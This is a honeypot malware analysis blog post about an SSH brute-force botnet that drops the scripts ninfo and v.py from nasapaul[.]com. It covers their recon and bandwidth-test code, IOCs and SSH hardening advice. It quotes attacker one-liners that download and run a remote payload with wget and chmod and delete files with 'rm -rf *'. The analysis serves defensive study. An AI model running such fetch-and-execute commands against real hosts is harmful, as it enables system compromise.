NasaPaul Botnet: A Need for Speed
Last updated: 2021-09-20
Updated: 2021-02-28 - Update detection section to explain why v.py
might not be flagged by AV.Updated: 2021-03-03 - Divide article by LM Kill Chain phases instead of MITRE ATT&CK framework.
Case Summary
I collect live malware samples from honeypots running on public cloud servers. This case examines a repeated security event following a successful bruteforce attack against SSH where malware payloads ninfo
and v.py
are dropped from nasapaul[.]com
. The samples examined in this post were captured on February 23rd, 2021.
Timeline
The security event described in this post was first logged on at 12:22:55 UTC on 2021-02-14. The event has been captured 33 times, with the latest related security event recorded at 16:03:19 UTC on 2021-02-25. If you are interested in viewing the raw logs associated with these repeated events, they can be found in this gist.
Delivery
In order to see any interaction from attackers on the honeypot, they must first brute force SSH. Successfully brute forcing the username admin
and password password
will allow the attacker to enter commands into an emulated shell. All entered commands return an error reporting the tool is not found (e.g. ls not found
). In all instances of this repeated security event the first payload ninfo
is seen after the attacker brute forces SSH.
Exploitation & Installation
In 31 of the 33 captured events calling home to nasapaul[.]com
the attacker downloads a payload, gives it execution permissions, and then runs the payload.
wget nasapaul[.]com/ninfo ; chmod +x * ; ./ninfo
Defense Evasion
A change in this behavior is observed in two security events on 2021-02-16 where the following commands are entered:
lscpu ; wget nasapaul[.]com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *
Here, the attacker now runs lscpu
and after pulling and running ninfo
it deletes all local files with rm -rf *
. The rm -rf *
is used to recursively destroy files ninfo
and v.py
in the working directory. Subsequent attacks on 2021-02-16 and later returned to the previous command line behavior, with no file removal process.
Collection
The purpose of ninfo
is to collect system information. As a reminder, the output of the script is viewed by the attacker via their SSH session. This information can then be scraped, cataloged and/or utilized. The following information is gathered by ninfo
:
- CPU
- CPU core count
- CPU stepping (similar to CPU version)
- CPU bogomips (a crude speed measurement of CPU)
- GPU type
- Disk space
- Uptime
- OS type
- OS version
- OS architecture
- Root or Privileged Process Access
Code Review
ninfo
code review
Lines 4
- 19
specify the color used during output. These values are called throughout the script and result in colored formatting of information sent to standard out.
Lines 23
- 37
set variables for requested information. The script uses tools cut
, sed
, grep
, head
, and awk
in order to manipulate the output of utility commands like lsb_release
, free
, uname
, uptime
, lscpi
, and df
and system files including /proc/cpuinfo
and /proc/uptime
. Using this technique the attacker is able to neatly print system information to the console in lines 55
- 63
.
Lines 65
- 71
check to see if the script is running as a privileged process via the EUID or as root via UID. nu ai
(not here) is printed if not root. ai
(here) is printed if the UID or EUID is 0
, indicating the script is running as a privileged process and/or the credentials in use by the attacker is root.
Next, ninfo
announces speed testul incepe in 3 secunde
(speed test starts in three seconds) then echos out a countdown to standard out. In line 83
it pulls down a second payload from the nasapaul
domain named v.py
. In line 84
the script attempts to run that payload with perl
. The following screenshot shows the output of ninfo
if run without network connectivity or simulation:
Additional Details
Source IP Origin
The following information was sourced from the Talos Intelligence IP Reputation Lookup. This does not confirm an origin of attack, but rather gives us insight into the last hop on the internet. It is noted all IP addresses are owned by corporations associated with cloud hosting services.
IP | NETWORK OWNER | LOCATION |
---|---|---|
52.152.130.178 | Microsoft Corporation | Washington, United States |
64.225.101.223 | Digital Ocean | Frankfurt am Main, Germany |
167.99.253.119 | Digital Ocean | Frankfurt am Main, Germany |
167.172.24.118 | Digital Ocean | Clifton, United States |
178.62.231.95 | Digital Ocean | Amsterdam, Netherlands |
188.166.99.239 | Digital Ocean | Amsterdam, Netherlands |
188.166.124.29 | Digital Ocean | Amsterdam, Netherlands |
A whois
search for these IP addresses identify an organizational link ORG-DOI2-RIPE
between some of the attacking IPs:
167.172.24.118/24
178.62.231.95/24
188.166.99.239/24
188.166.124.29/24
Language Indicators
An identifying characteristic of this script is that the language used is a mix of English and Romanian. Searchinging for drept de root
, versiune
, testul incepe in
, and secunde
via google translator returns a language match for Romanian.
A google search using code from the second payload v.py
returns two positive hits:
- A malware sample from a github repo of malware collected by honeypots uploaded in DEC 2017.
- A
speedtest-cli
github repository pointing to file speedtest.py from Matt Martz.
To test to see if any files from github user sivel
are being used by the attacker I hashed all files from the speedtest-cli
github repo and compared these hashes against the hash for v.py
. None of the hashes are matches, this means that if the attacker used a file from this repository it has since been modified. The results are shown below:
86aa0f938b6d6a3b2ba54481f1debae2 v.py
051b5371b2a098f10d8271bbfbcd8ee6 CONTRIBUTING.md
3b83ef96387f14655fc854ddc3c6bd57 LICENSE
89ba249b2bf282b2ea9c35e5fd3a197d MANIFEST.in
8192020c86e390adb168431fdbf260c1 README.rst
0566968464b829958e9bf431eb1db62f setup.cfg
2a22f34184b9275db470c39026428709 setup.py
6697b8da88cf890de4b057c0151aad2a speedtest-cli.1
322eb3ec52f028e6b1df6bd0a9f6cb52 speedtest.py
37547186527ed0466ae145073f9012d1 tox.ini
test/scripts/
51b873473209d18958a05c767723836b source.py
v.py
code review
The file v.py
is 803
lines long, substantially longer than ninfo
. If you would like to examine this file for yourself it can be retrieved from this github repository. Now we can review the code in v.py
in order to understand more about its behavior.
Overview in Comments
This attacker put a lot of comments into their code. We see the following statements printed to console:
1. Retrieving NasaPaul.com configuration
2. Retrieving NasaPaul.com server list
The attacker switches to Romanian (the English translation is shown):
3. Host Server is Google Cloud (Paul hides the IPs)
4. Looking for a server
5. Found a server start testing
And then they use English…
6. testing download speed
Then Romanian…
7. Download speed is XYZ Mbit/s
Then English, and then Romanian again.
8. Testing upload speed
9. The flood upload is XYZ Mbit/s
After which point the script ends and the botnet logs out. Note that XYZ
in this instance is a substitute for an upload/download speed value.
Main Function
I begin by looking at the main function def main()
found on lines 793
- 797
. The only defined functions called here are speedtest()
and print_()
.
def main():
try:
speedtest()
except KeyboardInterrupt:
print_('\nCancelling...')
The speedtest
function is defined in the file on lines 553
- 790
. We can get a sense of what the script is doing by logically following the calls to subroutines. This means you follow each call to a defined function, like a choose your own adventure book instead of reading the file start to finish. Though, you could totally do that too if you want to get a sense of the functions that might be called or preview to see if anything stylistically looks out of place or different. This code review will highlight some of the code using the comments printed to the console. If you’d like to skip ahead to the next section click here.
Retrieving configuration from nasapaul[.]com
References to nasapaul[.]com
are seen within speedtest()
on lines 624
and 632
.
The excerpt below has been pulled from lines 623
- 624
. Line 623
prints Retrieving NasaPaul.com configuration...'
to console. This step of the python script executes regardless of internet connectivity.
if not args.simple:
print_('\033[1;31m>>>> Retrieving \033[1;37m NasaPaul.com\033[1;m \033[1;31m configuration...')
try:
config = getConfig()
except URLError:
print_('Cannot retrieve speedtest configuration')
sys.exit(1)
In case you are wondering why args.simple
returns true each execution, note that args
is set by the the options parser seen in lines 568
to 604
where --simple
becomes args.simple
as args
is set to an options
tuple. options
is created from parser.parse_args()
. This logic is shared below:
description = (
'Command line interface for testing internet bandwidth using '
'speedtest.net.\n'
'------------------------------------------------------------'
'--------------\n'
'https://github.com/sivel/speedtest-cli')
parser = ArgParser(description=description)
# Give optparse.OptionParser an `add_argument` method for
# compatibility with argparse.ArgumentParser
try:
parser.add_argument = parser.add_option
except AttributeError:
pass
parser.add_argument('--bytes', dest='units', action='store_const',
const=('byte', 1), default=('bit', 8),
help='Display values in bytes instead of bits. Does '
'not affect the image generated by --share')
parser.add_argument('--share', action='store_true',
help='Generate and provide a URL to the speedtest.net '
'share results image')
parser.add_argument('--simple', action='store_true',
help='Suppress verbose output, only show basic '
'information')
parser.add_argument('--list', action='store_true',
help='Display a list of speedtest.net servers '
'sorted by distance')
parser.add_argument('--server', help='Specify a server ID to test against')
parser.add_argument('--mini', help='URL of the Speedtest Mini server')
parser.add_argument('--source', help='Source IP address to bind to')
parser.add_argument('--timeout', default=10, type=int,
help='HTTP timeout in seconds. Default 10')
parser.add_argument('--secure', action='store_true',
help='Use HTTPS instead of HTTP when communicating '
'with speedtest.net operated servers')
parser.add_argument('--version', action='store_true',
help='Show the version number and exit')
options = parser.parse_args()
if isinstance(options, tuple):
args = options[0]
else:
args = options
del options
Returning to the first block of code, after Retrieving NasaPaul.com configuration...'
is printed to console, on line 626
we see a call to getConfig()
. This function seen in lines 376
- 414
is shared below:
def getConfig():
"""Download the speedtest.net configuration and return only the data
we are interested in
"""
request = build_request('://www.speedtest.net/speedtest-config.php')
uh, e = catch_request(request)
if e:
print_('Could not retrieve speedtest.net configuration: %s' % e)
sys.exit(1)
configxml = []
while 1:
configxml.append(uh.read(10240))
if len(configxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(configxml))
config = {
'client': root.find('client').attrib,
'times': root.find('times').attrib,
'download': root.find('download').attrib,
'upload': root.find('upload').attrib}
except AttributeError: # Python3 branch
root = DOM.parseString(''.join(configxml))
config = {
'client': getAttributesByTagName(root, 'client'),
'times': getAttributesByTagName(root, 'times'),
'download': getAttributesByTagName(root, 'download'),
'upload': getAttributesByTagName(root, 'upload')}
except SyntaxError:
print_('Failed to parse speedtest.net configuration')
sys.exit(1)
del root
del configxml
return config
In the function snippet below pulled from getConfig()
above, a request
is built using build_request
for speedtest.net
. build_request
“build[s] a urllib2 request object to automatically add a user-agent header to all requests” for a url.
request = build_request('://www.speedtest.net/speedtest-config.php')
uh, e = catch_request(request)
Following the creation of request
, catch_request
is described as “a helper function to catch common exceptions when establishing a connection with a HTTP/S request.” The result of the catch_request(request)
and any resulting errors are stored in variables uh
and e
respectively. If an error is created and stored in variable e
the script will gracefully exit:
if e:
print_('Could not retrieve speedtest.net configuration: %s' % e)
sys.exit(1)
On lines 386
- 393
of the getConfig()
function a variable configxml
of type tuple is created. The response from www.speedtest.net/speedtest-config.php
in variable uh
is appended to configxml
. configxml[-1]
points to the last value in the tuple configxml
. If the length of this value is zero, then the while loop can break. If the value of the response from speednet.com
is anything other than 200 OK then None
is returned from getConfig()
.
configxml = []
while 1:
configxml.append(uh.read(10240))
if len(configxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
While the commented code reads, “retrieving configuration nasapaul[.]com” this behavior was not confirmed in the python script. Only communication to www.speedtest.net/speedtest-config.php
was observed.
Retrieving nasapaul Server List
Lines 631
- 644
handle commands related to the Retrieving NasaPaul[.]com server list...
comment printed to console:
if not args.simple:
print_('\033[1;31m>>>> Retrieving \033[1;37m NasaPaul.com\033[1;m \033[1;31m server list...')
if args.list or args.server:
servers = closestServers(config['client'], True)
if args.list:
serverList = []
for server in servers:
line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
'[%(d)0.2f km]' % server)
serverList.append(line)
print_('\n'.join(serverList).encode('utf-8', 'ignore'))
sys.exit(0)
else:
servers = closestServers(config['client'])
We want to look at the closestServers
functions to get a better idea of what servers are being used in this block of code. If you want to review these functions briefly check out this gist.
Looking at the closestServers()
definition, the urls in use are:
urls = [
'://www.speedtest.net/speedtest-servers-static.php',
'://c.speedtest.net/speedtest-servers-static.php',
'://www.speedtest.net/speedtest-servers.php',
'://c.speedtest.net/speedtest-servers.php',
]
Similar to what we’ve seen previously in getConfig()
we see calls out to the listered urls using build_request
and catch_request
:
for url in urls:
try:
request = build_request(url)
uh, e = catch_request(request)
if e:
errors.append('%s' % e)
raise SpeedtestCliServerListError
serversxml = []
while 1:
serversxml.append(uh.read(10240))
if len(serversxml[-1]) == 0:
break
if int(uh.code) != 200:
uh.close()
raise SpeedtestCliServerListError
uh.close()
While the commented code read, retrieving nasapaul[.]com server list
this behavior was not confirmed in the python script. Instead calls to speedtest.net
are seen.
Host Server is Google Cloud (Paul hides the IPs)
On lines 645
and 648
a print_
statement below prints out Server Hostat De
(Hosted Server) and Paul ascunde IPu
(Paul hides the IPu).
if not args.simple:
print_('\033[1;31m>>>> Server Hostat De \033[1;m \033[1;37m%(isp)s\033[1;m (\033[1;37mPaul ascunde IPu\033[1;m)\033[1;37m...' % config['client'])
However, this part of the script will print the ISP in use to console but no such evidence of “hiding IPs” was found in the python script.
Looking for and Finding a Server
Similar to the previous comment the comments, Cautam ce-l mai bun server
(We are looking for the best server) and Server Gasit incepem Testele
(Server found, tests are started) are printed to console prior to a call to getBestServers()
.
if not args.simple:
print_('\033[1;31m>>>> Cautam ce-l mai bun server \033[1;m')
print_('\033[1;31m>>>> Server Gasit incepem Testele \033[1;m')
best = getBestServer(servers)
The function getBestServers()
is defined on lines 498
- 534
:
def getBestServer(servers):
"""Perform a speedtest.net latency request to determine which
speedtest.net server has the lowest latency
"""
results = {}
for server in servers:
cum = []
url = '%s/latency.txt' % os.path.dirname(server['url'])
urlparts = urlparse(url)
for i in range(0, 3):
try:
if urlparts[0] == 'https':
h = HTTPSConnection(urlparts[1])
else:
h = HTTPConnection(urlparts[1])
headers = {'User-Agent': user_agent}
start = timeit.default_timer()
h.request("GET", urlparts[2], headers=headers)
r = h.getresponse()
total = (timeit.default_timer() - start)
except (HTTPError, URLError, socket.error):
cum.append(3600)
continue
text = r.read(9)
if int(r.status) == 200 and text == 'test=test'.encode():
cum.append(total)
else:
cum.append(3600)
h.close()
avg = round((sum(cum) / 6) * 1000, 3)
results[avg] = server
fastest = sorted(results.keys())[0]
best = results[fastest]
best['latency'] = fastest
return best
In this function, the passed variable servers
has been set in lines 634
or 644
via a call to closestServers()
using output created from the configServer()
function, discussed in the previous sections. I found no evidence to suggest that any servers related to nasapaul[.]com
were queried.
Testing Download and Upload Speeds
Finally, the download and upload speeds are collected using functions downloadspeed()
and uploadspeed()
.
if not args.simple:
print_(('\033[1;31m>>>> Server Intretinut de \033[1;37m%(sponsor)s\033[1;m (\033[1;37m%(name)s\033[1;m) \033[1;m[\033[1;37m%(d)0.2f km\033[1;m]\033[1;37m:\033[1;37m '
'%(latency)s ms\033[1;31m' % best).encode('utf-8', 'ignore'))
else:
print_('Ping: %(latency)s ms' % best)
sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
urls = []
for size in sizes:
for i in range(0, 4):
urls.append('%s/random%sx%s.jpg' %
(os.path.dirname(best['url']), size, size))
if not args.simple:
print_('>>>> Testing download speed', end='')
dlspeed = downloadSpeed(urls, args.simple)
if not args.simple:
print_()
print_('>>>> Download-ul este de : \033[1;37m%0.2f M%s/s' %
((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))
sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
sizes = []
for size in sizesizes:
for i in range(0, 25):
sizes.append(size)
if not args.simple:
print_('\033[1;31m>>>> Testing upload speed', end='')
ulspeed = uploadSpeed(best['url'], sizes, args.simple)
if not args.simple:
print_()
print_('>>>> Upload-ul de flood este : \033[1;37m%0.2f M%s/s\033[1;31m' %
((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))
if args.share and args.mini:
print_('Cannot generate a speedtest.net share results image while '
'testing against a Speedtest Mini server')
elif args.share:
dlspeedk = int(round((dlspeed / 1000) * 8, 0))
ping = int(round(best['latency'], 0))
ulspeedk = int(round((ulspeed / 1000) * 8, 0))
The uploadspeed()
and downloadspeed()
functions launch FileGetter and FilePutter threats to calculate upload/download speeds. Nothing in these functions appeared malicious nor did they redirect to a malicious url.
It is noted, however, that the results of the speed test are sent to speedtest[.]net
. This code is shown below:
# Build the request to send results back to speedtest.net
# We use a list instead of a dict because the API expects parameters
# in a certain order
apiData = [
'download=%s' % dlspeedk,
'ping=%s' % ping,
'upload=%s' % ulspeedk,
'promo=',
'startmode=%s' % 'pingselect',
'recommendedserverid=%s' % best['id'],
'accuracy=%s' % 1,
'serverid=%s' % best['id'],
'hash=%s' % md5(('%s-%s-%s-%s' %
(ping, ulspeedk, dlspeedk, '297aae72'))
.encode()).hexdigest()]
headers = {'Referer': 'http://c.speedtest.net/flash/speedtest.swf'}
request = build_request('://www.speedtest.net/api/api.php',
data='&'.join(apiData).encode(),
headers=headers)
f, e = catch_request(request)
if e:
print_('Could not submit results to speedtest.net: %s' % e)
sys.exit(1)
response = f.read()
code = f.code
f.close()
In an effort to be clear, I will repeat that speedtest.net
is the only domain used in the v.py
script aside from the nasapaul[.]com
references printed to console using print_()
. All network related communication in the v.py
script appears limited to speedtest.net
.
Impact
Successful execution of ninfo
results in losing information about system specification including hardware or virtualized hardware specifications described in the Collection section above. Successful execution of v.py
results in information about the system’s bandwidth and level of privilege associated with the compromised login. This information is relayed to the attacker via the SSH session. Typically, these types of collections are stored and re-used either for manipulation by the original attacker or they could be sold on a criminal network for use in a DDoS for hire like a DDoSaaS offering.
All of these attacks originated from successful bruteforce attempts against SSH. There are a few strategies you can use to protect against SSH attacks. You could move the SSH port to a non-default port (e.g. from p22 to p43895). This will subvert some automated attacks, but it is a weak control because the new SSH port can be identified with a simple nmap
scan. A more effective way to protect against SSH attacks would be to authenticate using an SSH key or using certificate-based authentication. To pair with this control, you should modify the global ssh configuration file (/etc/ssh/ssh_config
) to disable password authentication. You could also use a service like fail2ban
to put IPs with repeated failed authentication attempts to SSH on a denylist. For example, if an IP address fails to authenticate 10 times in a row fail2ban
would jail
the IP, effectively preventing it from being able to login using SSH for a period of time.
Unanswered Questions & Opinions
In my opinion these security events may be the result of a botnet looking for victim hosts to utilize as a part of a DDoS network and/or to be used to serve and collect information about other vulnerable hosts. I have reached this conclusion because the commands seen in the repeated security event are limited to collection information related to computer specifications and bandwidth. Another potential explaination could be that the botnet is searching for victims to mine cryptocurrency. Without further information, these conclusions are purely speculative.
There are a few questions leftover from this case I am still asking myself. Foremost in my mind is seeing a python script run with perl
. I could see perl
being remapped to a python
binary but this behavior was not seen in ninfo
. How does that work? Is the #!/usr/bin/env python
on line 1
of the file enough for the interpreter to know to use python
instead of perl
? If I learn anything new related to this event I’ll update and mark the date at the top of this post and/or link to more information.
Detections
When scanned with clamAV no detections are yet seen:
When I first uploaded ninfo
to virustotal on 2021-02-23 it had 1/64 antivirus detections. Since then, the number has increased to 6/64.
v.py
remains at undetected as of 2021-02-27. This is not surprising since the script is a a bandwidth test that reaches out to a known good site, Speedtest by Ookla. Whether the script is malicious or not could be of debate, though, since this specific script v.py
used in the context of data collection I would flag the hash.
Network
The following IP addresses were associated with one or more successful SSH brute force attacks.
52.152.130.178
64.225.101.223
167.99.253.119
167.172.24.118
178.62.231.95
188.166.99.239
188.166.124.29
DNS
The following hostnames were associated with one or more of the security events described in this post.
nasapaul[.]com
wpmudev[.]host
File Hashes
md5sum
678af2ec3251f8692c9324ffe64c198a ninfo
86aa0f938b6d6a3b2ba54481f1debae2 v.py
sha256sum
19778a62055770a9e5f890e52227ccd39251bf23045c15383411638540ceabf7 ninfo
00e430b733cf199747c9c6e0f2e2fae6a045bbed9c0f0f993112b301fcdf5dbc v.py
MITRE Tactics
- T1595 Active Scanning: Scanning IP Blocks
- T1110 Brute Force
- T1190 Exploit Public-Facing Application
- T1078 Valid Accounts: Local Accounts
- T1119 Automated Collection
- T1059 Command and Scripting Interpreter
- T1070 Indicator Removal on Host: File Deletion